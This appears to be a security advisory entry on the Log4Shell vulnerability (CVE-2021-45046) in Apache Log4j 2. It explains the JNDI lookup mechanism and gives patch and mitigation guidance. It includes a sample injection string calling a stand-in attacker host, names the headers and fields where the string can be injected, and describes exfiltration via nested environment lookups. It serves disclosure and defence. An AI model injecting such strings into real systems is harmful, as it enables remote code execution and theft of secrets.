
Log4j - Remote Code Execution (Log4Shell - CVE-2021-45046)

Source: pentest-tools.com (indexed 2025-03-25)
Description:
The Log4j 2 logging library is affected by a remote code execution vulnerability widely known as Log4Shell. The root cause is not a missing input check on one parameter but the fact that Log4j performs lookup substitution inside the text of the log message itself: a feature called message lookup substitution, enabled by default in Apache Log4j 2.0-beta9 through 2.14.1, expands ${...} patterns found in the logged message, and one of the supported lookups, ${jndi:...}, hands the embedded URL to JNDI. JNDI in turn supports several protocols, including LDAP, LDAPS, RMI and DNS. An attacker who can get a string such as ${jndi:ldap://attacker.example/a} into any value the application logs (a request parameter, the URL path, an HTTP header such as User-Agent, a username) therefore makes the vulnerable server connect to a host they control; an LDAP/LDAPS or RMI response can reference a remote Java class or carry a serialized object that the server then loads and executes. A DNS lookup cannot deliver code, but it is enough to confirm that a target is vulnerable and to exfiltrate data, for example by nesting another lookup such as ${env:...} inside the hostname.

The original issue is CVE-2021-44228. CVE-2021-45046, the identifier this entry carries, is the follow-up: the fix shipped in Log4j 2.15.0 was incomplete. In non-default configurations, where the pattern layout uses a Context Lookup (for example $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), an attacker who controls Thread Context Map data can still trigger a JNDI lookup, which yields information disclosure and remote code execution in some environments and local code execution in all environments. The log4j2.formatMsgNoLookups=true / LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation recommended for CVE-2021-44228 does not cover these configurations.

Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix CVE-2021-45046 by removing message lookup support entirely and disabling JNDI by default. Where an immediate upgrade is not possible, removing the JndiLookup class from the jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) is the vendor-documented mitigation. Later releases address further, separate lookup-related issues (2.17.0 for CVE-2021-45105, 2.17.1 for CVE-2021-44832), so in practice upgrade to 2.17.1 or newer rather than stopping at 2.16.0.
Provider:
pentest-tools.com